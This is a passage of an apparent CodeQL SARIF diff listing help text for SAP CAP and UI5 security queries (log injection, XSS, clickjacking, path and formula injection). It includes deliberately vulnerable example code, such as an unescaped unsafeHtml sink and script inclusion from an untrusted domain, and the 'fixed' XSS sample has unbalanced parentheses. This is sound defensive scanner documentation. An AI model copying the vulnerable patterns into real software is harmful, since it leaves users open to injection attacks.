It's recommended to make use of an existing Encoder such as OWASP ESAPI.\n\n## Examples\n\nThis CAP service directly logs what the user submitted via the `req` request.\n\n``` javascript\nimport cds from '@sap/cds'\nconst { Books } = cds.entities ('sap.capire.bookshop')\n\nclass SampleVulnService extends cds.ApplicationService { init(){\n this.on ('submitOrder', async req => {\n const {book,quantity} = req.data\n const LOG = cds.log(\"nodejs\");\n LOG.info(\"test\" + book); // Log injection alert\n })\n\n return super.init()\n}}\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n", - "markdown" : "# CAP Log Injection\n\nIf unsanitized user input is written to a log entry using the CAP Node.js logging API, a malicious user may be able to forge new log entries.\n\nCAP Node.js offers a CLRF-safe logging API that should be used for application log entries that are logged as plaintext. If the entry is interpreted as HTML, then arbitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nCAP applications need to care for escaping user data that is used as input parameter for application logging. 
It's recommended to make use of an existing Encoder such as OWASP ESAPI.\n\n## Examples\n\nThis CAP service directly logs what the user submitted via the `req` request.\n\n``` javascript\nimport cds from '@sap/cds'\nconst { Books } = cds.entities ('sap.capire.bookshop')\n\nclass SampleVulnService extends cds.ApplicationService { init(){\n this.on ('submitOrder', async req => {\n const {book,quantity} = req.data\n const LOG = cds.log(\"nodejs\");\n LOG.info(\"test\" + book); // Log injection alert\n })\n\n return super.init()\n}}\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n" - }, - "properties" : { - "tags" : [ "security" ], - "description" : "Building log entries from user-controlled sources is vulnerable to\n insertion of forged log entries by a malicious user.", - "id" : "js/cap-log-injection", - "kind" : "path-problem", - "name" : "CAP Log injection", - "precision" : "medium", - "problem.severity" : "error", - "security-severity" : "6.1" - } - } ], - "locations" : [ { - "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/src/", - "description" : { - "text" : "The QL pack root directory." - } - }, { - "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/src/qlpack.yml", - "description" : { - "text" : "The QL pack definition file." - } - } ] - }, { - "name" : "generated/extension-pack", - "semanticVersion" : "0.0.0", - "locations" : [ { - "uri" : "file:///home/runner/work/_temp/codeql_databases/javascript/temp/extension-pack/", - "description" : { - "text" : "The QL pack root directory." 
- } - }, { - "uri" : "file:///home/runner/work/_temp/codeql_databases/javascript/temp/extension-pack/codeql-pack.yml", - "description" : { - "text" : "The QL pack definition file." - } - } ] - }, { - "name" : "advanced-security/javascript-sap-ui5-queries", - "semanticVersion" : "0.6.0+ebe0a6bdde3b48cd48fb332dd689a81c5906dbfe", - "rules" : [ { - "id" : "js/ui5-xss", - "name" : "js/ui5-xss", - "shortDescription" : { - "text" : "UI5 Client-side cross-site scripting" - }, - "fullDescription" : { - "text" : "Writing user input directly to a UI5 View allows for a cross-site scripting vulnerability." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Client-side cross-site scripting\n\nReceiving text from the user, most notably through a control, and rendering it as HTML in another control can lead to a cross-site scripting vulnerability.\n\n## Recommendation\n\n### Preventing XSS Involving User Defined Control\n\nIf the XSS attack vector includes a user-defined control, then we can mitigate the issue by sanitizing the user-provided input in the implementation of the control:\n- Where possible, define the property type to something other than `string` or `any`. If a value should be used, then opt for the `enum` type which only allows a predefined set of strings.\n- Use escaping functions in `sap.base.security`. Relevant sanitizers include `encodeXML` and `encodeHTML`.\n- When using API with `apiVersion: 2` (Semantic Rendering), do not use `RenderManager.unsafeHtml` unless the control property `sanitizeContent` is set to `true`.\n- When using the now-deprecated older API with `RenderManager.write` or `RenderManager.writeAttribute`, use their respective counterparts `RenderManager.writeEscaped` and `RenderManager.writeAttributeEscaped` which sanitizes their rendered contents.\n\n### Preventing XSS Not Involving User Defined Control\n\nAn XSS attack vector can still exist even when no user-defined control is used. 
In this case, a model property or a control property act as an intermediate step when external data is passed in.\nIn this case, the UI5 application should not use the property as is, but should sanitize the contents before reading it. Such sanitization can take place in the controller or in the view declaration using expression bindings.\n\n## Example\n\n### Custom Control with Custom Rendering Method\n\nThis custom control `vulnerable.control.xss` calls `unsafeHtml` on a given `RenderManager` instance in its static renderer function. Since its `text` property is an unrestricted string type, it can point to a string with contents that can be interpreted as HTML. If it is the case, `unsafeHtml` will render the string, running a possibly embedded JavaScript code in it.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\"], function (Control) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"string\" } } },\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(oControl.getText()); // sink\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\nThis is the same custom control without the possibility of XSS using several means of sanitization: The property `text` is enforced to a non-string type, hence disallows unrestricted strings (This is espcially applicable if the expected input is a number anyways). 
Also, the `sap.base.security.encodeXML` function is used to escape HTML control characters.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\", \"sap/base/security/encodeXML\"], function (Control, encodeXML) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"int\" } } }, // constrain the type\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(encodeXML(oControl.getText()); // encode using security functions\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\n### Library Control\n\nThis example contains only library controls that are not user-defined. The untrusted user input flows from `sap.m.Input` and directly flows out via `sap.ui.core.HTML` through the model property `input` as declared in the `onInit` method of the controller.\n\n``` xml\n\n \t \n \n\n```\n\n``` javascript\nsap.ui.define([\"sap/ui/core/mvc/Controller\", \"sap/ui/model/json/JSONModel\"],\n function (Controller, JSONModel) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function () {\n var oData = { input: null };\n var oModel = new JSONModel(oData);\n this.getView().setModel(oModel);\n },\n });\n },\n);\n```\n\nThe issue can be resolved by setting the `HTML` control's `sanitizeContent` attribute to true.\n\n``` xml\n\n \n \n\n```\n\n## References\n\n- OWASP: [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n- SAP UI5 Documentation: [Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/91f0bd316f4d1014b6dd926db0e91070.html) in UI5.\n- SAP UI5 Documentation: [Prevention of Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/4de64e2e191f4a7297d4fd2d1e233a2d.html) in UI5.\n- SAP UI5 Documentation: [API Documentation of sap.ui.core.RenderManager](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.RenderManager).\n- SAP UI5 Documentation: [Defining Control 
Properties](https://sapui5.hana.ondemand.com/sdk/#/topic/ac56d92162ed47ff858fdf1ce26c18c4.html).\n- SAP UI5 Documentation: [Expression Binding](https://sapui5.hana.ondemand.com/sdk/#/topic/daf6852a04b44d118963968a1239d2c0).\n- SAP UI5 API Reference: [`sap.ui.core.HTML`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.HTML%23methods/setSanitizeContent).\n- Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n- Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", - "markdown" : "# Client-side cross-site scripting\n\nReceiving text from the user, most notably through a control, and rendering it as HTML in another control can lead to a cross-site scripting vulnerability.\n\n## Recommendation\n\n### Preventing XSS Involving User Defined Control\n\nIf the XSS attack vector includes a user-defined control, then we can mitigate the issue by sanitizing the user-provided input in the implementation of the control:\n- Where possible, define the property type to something other than `string` or `any`. If a value should be used, then opt for the `enum` type which only allows a predefined set of strings.\n- Use escaping functions in `sap.base.security`. Relevant sanitizers include `encodeXML` and `encodeHTML`.\n- When using API with `apiVersion: 2` (Semantic Rendering), do not use `RenderManager.unsafeHtml` unless the control property `sanitizeContent` is set to `true`.\n- When using the now-deprecated older API with `RenderManager.write` or `RenderManager.writeAttribute`, use their respective counterparts `RenderManager.writeEscaped` and `RenderManager.writeAttributeEscaped` which sanitizes their rendered contents.\n\n### Preventing XSS Not Involving User Defined Control\n\nAn XSS attack vector can still exist even when no user-defined control is used. 
In this case, a model property or a control property act as an intermediate step when external data is passed in.\nIn this case, the UI5 application should not use the property as is, but should sanitize the contents before reading it. Such sanitization can take place in the controller or in the view declaration using expression bindings.\n\n## Example\n\n### Custom Control with Custom Rendering Method\n\nThis custom control `vulnerable.control.xss` calls `unsafeHtml` on a given `RenderManager` instance in its static renderer function. Since its `text` property is an unrestricted string type, it can point to a string with contents that can be interpreted as HTML. If it is the case, `unsafeHtml` will render the string, running a possibly embedded JavaScript code in it.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\"], function (Control) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"string\" } } },\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(oControl.getText()); // sink\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\nThis is the same custom control without the possibility of XSS using several means of sanitization: The property `text` is enforced to a non-string type, hence disallows unrestricted strings (This is espcially applicable if the expected input is a number anyways). 
Also, the `sap.base.security.encodeXML` function is used to escape HTML control characters.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\", \"sap/base/security/encodeXML\"], function (Control, encodeXML) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"int\" } } }, // constrain the type\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(encodeXML(oControl.getText()); // encode using security functions\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\n### Library Control\n\nThis example contains only library controls that are not user-defined. The untrusted user input flows from `sap.m.Input` and directly flows out via `sap.ui.core.HTML` through the model property `input` as declared in the `onInit` method of the controller.\n\n``` xml\n\n \t \n \n\n```\n\n``` javascript\nsap.ui.define([\"sap/ui/core/mvc/Controller\", \"sap/ui/model/json/JSONModel\"],\n function (Controller, JSONModel) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function () {\n var oData = { input: null };\n var oModel = new JSONModel(oData);\n this.getView().setModel(oModel);\n },\n });\n },\n);\n```\n\nThe issue can be resolved by setting the `HTML` control's `sanitizeContent` attribute to true.\n\n``` xml\n\n \n \n\n```\n\n## References\n\n- OWASP: [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n- SAP UI5 Documentation: [Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/91f0bd316f4d1014b6dd926db0e91070.html) in UI5.\n- SAP UI5 Documentation: [Prevention of Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/4de64e2e191f4a7297d4fd2d1e233a2d.html) in UI5.\n- SAP UI5 Documentation: [API Documentation of sap.ui.core.RenderManager](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.RenderManager).\n- SAP UI5 Documentation: [Defining Control 
Properties](https://sapui5.hana.ondemand.com/sdk/#/topic/ac56d92162ed47ff858fdf1ce26c18c4.html).\n- SAP UI5 Documentation: [Expression Binding](https://sapui5.hana.ondemand.com/sdk/#/topic/daf6852a04b44d118963968a1239d2c0).\n- SAP UI5 API Reference: [`sap.ui.core.HTML`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.HTML%23methods/setSanitizeContent).\n- Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n- Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], - "description" : "Writing user input directly to a UI5 View allows for\n a cross-site scripting vulnerability.", - "id" : "js/ui5-xss", - "kind" : "path-problem", - "name" : "UI5 Client-side cross-site scripting", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "6.1" - } - }, { - "id" : "js/ui5-clickjacking", - "name" : "js/ui5-clickjacking", - "shortDescription" : { - "text" : "UI5 Clickjacking" - }, - "fullDescription" : { - "text" : "The absence of frame options allows for clickjacking." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Clickjacking\n\nUI5 applications that do not explicitly set the frame options to `deny` may be vulnerable to UI redress attacks (”clickjacking”). 
In these attacks, the vulnerable site is loaded in a frame on an attacker-controlled site which uses opaque or transparent layers to trick the user into unintentionally clicking a button or link on the vulnerable site.\n\n## Recommendation\n\nExplicitly set the frame options to `\"deny\"`, either through `window[\"sap-ui-config\"]`, or `data-sap-ui-frameOptions` attribute of the script tag where it sources the bootstrap script `\"sap-ui-core.js\"`:\n\n``` javascript\nwindow[\"sap-ui-config\"] = {\n frameOptions: \"deny\",\n ...\n};\n```\n\n``` javascript\nwindow[\"sap-ui-config\"].frameOptions = \"deny\";\n```\n\n``` html\n\n```\n\n## Example\n\n### Setting the Frame Options to `\"allow\"`\n\nThis UI5 application explicitly allows to be embedded in other applications.\n\n```javascript\n\n\n \n ...\n \n\n \n \n ...\n\n```\n\n### Not Setting the Frame Options to Anything\n\nThe default value of `window[\"sap-ui-config\"]` and `data-sap-ui-frameOptions` are both `\"allow\"`, which makes leaving it untouched allows the application to be embedded.\n\n## References\n* OWASP: [Clickjacking Defense Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html).\n* Mozilla: [X-Frame-Options](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options).\n* SAP UI5 Documentation: [Frame Options](https://sapui5.hana.ondemand.com/sdk/#/topic/62d9c4d8f5ad49aa914624af9551beb7.html).\n* SAP UI5 Documentation: [Allowlist Service](https://sapui5.hana.ondemand.com/sdk/#/topic/d04a6d41480c4396af16b5d2b25509ec.html).\n* Common Weakness Enumeration: [CWE-451](https://cwe.mitre.org/data/definitions/451.html).\n", - "markdown" : "# Clickjacking\n\nUI5 applications that do not explicitly set the frame options to `deny` may be vulnerable to UI redress attacks (”clickjacking”). 
In these attacks, the vulnerable site is loaded in a frame on an attacker-controlled site which uses opaque or transparent layers to trick the user into unintentionally clicking a button or link on the vulnerable site.\n\n## Recommendation\n\nExplicitly set the frame options to `\"deny\"`, either through `window[\"sap-ui-config\"]`, or `data-sap-ui-frameOptions` attribute of the script tag where it sources the bootstrap script `\"sap-ui-core.js\"`:\n\n``` javascript\nwindow[\"sap-ui-config\"] = {\n frameOptions: \"deny\",\n ...\n};\n```\n\n``` javascript\nwindow[\"sap-ui-config\"].frameOptions = \"deny\";\n```\n\n``` html\n\n```\n\n## Example\n\n### Setting the Frame Options to `\"allow\"`\n\nThis UI5 application explicitly allows to be embedded in other applications.\n\n```javascript\n\n\n \n ...\n \n\n \n \n ...\n\n```\n\n### Not Setting the Frame Options to Anything\n\nThe default value of `window[\"sap-ui-config\"]` and `data-sap-ui-frameOptions` are both `\"allow\"`, which makes leaving it untouched allows the application to be embedded.\n\n## References\n* OWASP: [Clickjacking Defense Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html).\n* Mozilla: [X-Frame-Options](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options).\n* SAP UI5 Documentation: [Frame Options](https://sapui5.hana.ondemand.com/sdk/#/topic/62d9c4d8f5ad49aa914624af9551beb7.html).\n* SAP UI5 Documentation: [Allowlist Service](https://sapui5.hana.ondemand.com/sdk/#/topic/d04a6d41480c4396af16b5d2b25509ec.html).\n* Common Weakness Enumeration: [CWE-451](https://cwe.mitre.org/data/definitions/451.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-451" ], - "description" : "The absence of frame options allows for clickjacking.", - "id" : "js/ui5-clickjacking", - "kind" : "problem", - "name" : "UI5 Clickjacking", - "precision" : "medium", - "problem.severity" : "error", - "security-severity" : "6.1" - } - }, 
{ - "id" : "js/ui5-path-injection", - "name" : "js/ui5-path-injection", - "shortDescription" : { - "text" : "UI5 Path Injection" - }, - "fullDescription" : { - "text" : "Constructing path from an uncontrolled remote source to be passed to a filesystem API allows for manipulation of the local filesystem." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Client-side path injection\n\nUI5 applications that access files using a dynamically configured path are vulnerable to injection attacks that allow an attacker to manipulate the file location.\n\n## Recommendation\n\n### Make path argument independent of the user input\n\nIf possible, do not parameterize the path on a user input. Either hardcode the path string in the source, or use only strings that are created within the application.\n\n### Keep an allow-list of safe paths\n\nKeep a strict allow-list of safe paths to load from or send requests to. Before loading a script from a location outside the application or making an API request to a location, check if the path is contained in the list of safe paths. Also, make sure that the allow-list is kept up to date.\n\n### Check the script into the repository or use package managers\n\nSince the URL of the script may be pointing to a web server vulnerable to being hijacked, it may be a good idea to check a stable version of the script into the repository to increase the degree of control. 
If not possible, use a trusted package manager such as `npm`.\n\n## Example\n\n### Including scripts from an untrusted domain\n\n``` javascript\nsap.ui.require([\n \"sap/ui/dom/includeScript\"\n ],\n function(includeScript) {\n includeScript(\"http://some.vulnerable.domain/some-script.js\");\n }\n);\n```\n\nIf the vulnerable domain is outside the organization and controlled by an untrusted third party, this may result in arbitrary code execution in the user's browser.\n\n### Using user input as a name of a file to be saved\n\nSuppose a controller is configured to receive a response from a server as follows.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/core/util/File\"\n ],\n function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function() {\n let oDataV2Model = this.getOwnerComponent().getModel(\"some-ODatav2-model\");\n this.getView().setModel(oDataV2Model);\n },\n \n onSomeEvent: function() {\n let remoteResponse = this.getView().getModel().getProperty(\"someProperty\");\n File.save(\"some-content\", remoteResponse, \"txt\", \"text/plain\", \"utf-8\");\n }\n });\n });\n```\n\nEven if the server which updates the OData V2 model is in a trusted domain such as within the organization, the server may still contain tainted information if the UI5 application in question is vulnerable to other security attacks, say XSS. 
This may allow an attacker to save a file in the victim's local filesystem.\n\n## References\n\n- Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n- Common Weakness Enumeration: [CWE-073](https://cwe.mitre.org/data/definitions/73.html).\n- SAP UI5 API Reference: [`sap.ui.core.util.File`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n- SAP UI5 API Reference: [`sap.ui.dom.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`sap.ui.dom.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeStylesheet).\n- SAP UI5 API Reference: [`jQuery.sap.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`jQuery.sap.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript).\n", - "markdown" : "# Client-side path injection\n\nUI5 applications that access files using a dynamically configured path are vulnerable to injection attacks that allow an attacker to manipulate the file location.\n\n## Recommendation\n\n### Make path argument independent of the user input\n\nIf possible, do not parameterize the path on a user input. Either hardcode the path string in the source, or use only strings that are created within the application.\n\n### Keep an allow-list of safe paths\n\nKeep a strict allow-list of safe paths to load from or send requests to. Before loading a script from a location outside the application or making an API request to a location, check if the path is contained in the list of safe paths. 
Also, make sure that the allow-list is kept up to date.\n\n### Check the script into the repository or use package managers\n\nSince the URL of the script may be pointing to a web server vulnerable to being hijacked, it may be a good idea to check a stable version of the script into the repository to increase the degree of control. If not possible, use a trusted package manager such as `npm`.\n\n## Example\n\n### Including scripts from an untrusted domain\n\n``` javascript\nsap.ui.require([\n \"sap/ui/dom/includeScript\"\n ],\n function(includeScript) {\n includeScript(\"http://some.vulnerable.domain/some-script.js\");\n }\n);\n```\n\nIf the vulnerable domain is outside the organization and controlled by an untrusted third party, this may result in arbitrary code execution in the user's browser.\n\n### Using user input as a name of a file to be saved\n\nSuppose a controller is configured to receive a response from a server as follows.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/core/util/File\"\n ],\n function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function() {\n let oDataV2Model = this.getOwnerComponent().getModel(\"some-ODatav2-model\");\n this.getView().setModel(oDataV2Model);\n },\n \n onSomeEvent: function() {\n let remoteResponse = this.getView().getModel().getProperty(\"someProperty\");\n File.save(\"some-content\", remoteResponse, \"txt\", \"text/plain\", \"utf-8\");\n }\n });\n });\n```\n\nEven if the server which updates the OData V2 model is in a trusted domain such as within the organization, the server may still contain tainted information if the UI5 application in question is vulnerable to other security attacks, say XSS. 
This may allow an attacker to save a file in the victim's local filesystem.\n\n## References\n\n- Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n- Common Weakness Enumeration: [CWE-073](https://cwe.mitre.org/data/definitions/73.html).\n- SAP UI5 API Reference: [`sap.ui.core.util.File`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n- SAP UI5 API Reference: [`sap.ui.dom.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`sap.ui.dom.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeStylesheet).\n- SAP UI5 API Reference: [`jQuery.sap.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`jQuery.sap.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-022", "external/cwe/cwe-035" ], - "description" : "Constructing path from an uncontrolled remote source to be passed\n to a filesystem API allows for manipulation of the local filesystem.", - "id" : "js/ui5-path-injection", - "kind" : "path-problem", - "name" : "UI5 Path Injection", - "precision" : "medium", - "problem.severity" : "error", - "security-severity" : "7.8" - } - }, { - "id" : "js/ui5-log-injection", - "name" : "js/ui5-log-injection", - "shortDescription" : { - "text" : "UI5 Log injection" - }, - "fullDescription" : { - "text" : "Building log entries from user-controlled sources is vulnerable to insertion of forged log entries by a malicious user." 
- }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Log Injection\n\nIf an untrusted input, possibly through a UI5 control, is not sanitized and passed onto a logging function, it is possible that a malicious actor submits a crafted input which might lead to forging log entries. If the entries are logged as plaintext, then newline characters may be inserted by the malicious actor. If the entry is interpreted as HTML, then artitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nAvoid directly logging untrusted input from a remote source and sanitize it by replaceing characters so that the input no longer contains control characters and substrings that may be interpreted as HTML.\n\n## Examples\n\nThis UI5 application directly outputs what the user submitted via the `sap.m.Input` control.\n\n``` xml\n\n \n\n```\n\n``` javascript\nsap.ui.define(\n [\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/model/json/JSONModel\",\n \"sap/base/Log/info\",\n ],\n function (Controller, JSONModel, info) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSearchCompleted: function () {\n var oView = this.getView();\n var oSearchField = oView.byId(\"searchTodoItemsInput\");\n var searchValue = oSearchField.getValue();\n info(searchValue); // Sink\n },\n });\n },\n);\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP UI5 Documentation: [namespace `sap/base/Log`](https://sapui5.hana.ondemand.com/sdk/#api/module:sap/base/Log).\n", - "markdown" : "# Log Injection\n\nIf an untrusted input, possibly through a UI5 control, is not sanitized and passed onto a logging function, it is possible that a malicious actor submits a crafted input which might lead to forging log entries. 
If the entries are logged as plaintext, then newline characters may be inserted by the malicious actor. If the entry is interpreted as HTML, then artitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nAvoid directly logging untrusted input from a remote source and sanitize it by replaceing characters so that the input no longer contains control characters and substrings that may be interpreted as HTML.\n\n## Examples\n\nThis UI5 application directly outputs what the user submitted via the `sap.m.Input` control.\n\n``` xml\n\n \n\n```\n\n``` javascript\nsap.ui.define(\n [\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/model/json/JSONModel\",\n \"sap/base/Log/info\",\n ],\n function (Controller, JSONModel, info) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSearchCompleted: function () {\n var oView = this.getView();\n var oSearchField = oView.byId(\"searchTodoItemsInput\");\n var searchValue = oSearchField.getValue();\n info(searchValue); // Sink\n },\n });\n },\n);\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP UI5 Documentation: [namespace `sap/base/Log`](https://sapui5.hana.ondemand.com/sdk/#api/module:sap/base/Log).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-117" ], - "description" : "Building log entries from user-controlled sources is vulnerable to\n insertion of forged log entries by a malicious user.", - "id" : "js/ui5-log-injection", - "kind" : "path-problem", - "name" : "UI5 Log injection", - "precision" : "medium", - "problem.severity" : "error", - "security-severity" : "7.8" - } - }, { - "id" : "js/ui5-formula-injection", - "name" : "js/ui5-formula-injection", - "shortDescription" : { - "text" : "UI5 Formula Injection" - }, - "fullDescription" : { - "text" : "Saving data from an uncontrolled remote source 
using filesystem or local storage leads to disclosure of sensitive information or forgery of entry." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Formula injection\n\nUI5 applications that save local data, fetched from an uncontrolled remote source, into a CSV file format using generic APIs such as [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save) are vulnerable to formula injection, or CSV injection.\n\n## Recommendation\n\n### Escape the leading special characters\n\nCSV cells containing leading special characters such as an equal sign (`=`) may be interpreted as spreadsheet formulas. To prevent them from being interpreted these prefixes should be escaped by surrounding the prefixes with single quotes in order to keep them as literal strings.\n\n### Use a dedicated API function\n\nManual construction of a CSV file using string concatenation is prone to mistakes that can lead to security issues. Instead, a dedicated library function should be used. 
For example, if the target being exported is a [`sap.m.Table`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.m.Table) and the resulting file is to intended to be opened using a spreadsheet program anyways, then using one of the API functions provided by [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet) is the preferred method of achieving the same exporting functionality.\n\n## Example\n\nThe following controller is exporting a CSV file obtained from an event parameter by surrounding it in a pair of semicolons (`;`) as CSV separators.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/Controller\",\n \"sap/ui/core/util/File\"\n ], function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSomeEvent: function(oEvent) {\n let response = oEvent.getProperty(\"someProperty\").someField;\n let csvRow = \";\" + response + \";\";\n File.save(csvRow, \"someFile\", \"csv\", \"text/csv\", \"utf-8\");\n }\n });\n });\n```\n\n## References\n\n- OWASP: [CSV Injection](https://owasp.org/www-community/attacks/CSV_Injection).\n- Common Weakness Enumeration: [CWE-1236](https://cwe.mitre.org/data/definitions/1236.html).\n- SAP UI5 API Reference: [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet).\n- SAP UI5 API Reference: [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n", - "markdown" : "# Formula injection\n\nUI5 applications that save local data, fetched from an uncontrolled remote source, into a CSV file format using generic APIs such as [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save) are vulnerable to formula injection, or CSV injection.\n\n## Recommendation\n\n### Escape the leading special characters\n\nCSV cells containing leading special characters such as an equal sign (`=`) 
may be interpreted as spreadsheet formulas. To prevent them from being interpreted these prefixes should be escaped by surrounding the prefixes with single quotes in order to keep them as literal strings.\n\n### Use a dedicated API function\n\nManual construction of a CSV file using string concatenation is prone to mistakes that can lead to security issues. Instead, a dedicated library function should be used. For example, if the target being exported is a [`sap.m.Table`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.m.Table) and the resulting file is to intended to be opened using a spreadsheet program anyways, then using one of the API functions provided by [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet) is the preferred method of achieving the same exporting functionality.\n\n## Example\n\nThe following controller is exporting a CSV file obtained from an event parameter by surrounding it in a pair of semicolons (`;`) as CSV separators.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/Controller\",\n \"sap/ui/core/util/File\"\n ], function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSomeEvent: function(oEvent) {\n 